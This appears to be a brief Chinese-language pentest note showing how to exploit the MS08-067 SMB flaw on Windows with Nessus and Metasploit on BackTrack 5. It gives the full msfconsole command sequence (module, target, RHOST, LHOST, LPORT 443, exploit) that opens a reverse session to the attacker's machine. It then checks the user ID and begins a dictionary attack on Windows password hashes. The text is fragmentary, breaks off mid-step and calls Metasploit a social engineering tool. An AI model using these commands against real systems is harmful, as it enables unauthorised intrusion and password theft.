2024年6月10日发(作者:)

Bt5应用层攻击工具MSF

漏洞利用:ms08_067

攻击工具:Nessus、Metasploit

利用国际知名的综合漏洞扫描工具Nessus扫描系统系统

开启社会工程学攻击工具MSF

msfconsole

use windows/smb/ms08_067_netapi

show targets

set target 41

set RHOST 192.168.1.103

set LHOST 192.168.1.105

set LPORT 443

exploit

溢出成功建立会话

查看当前用户的uid

G

etuid

利用字典破解windows的账户密码

cd /pentest/password/

字典名称 hash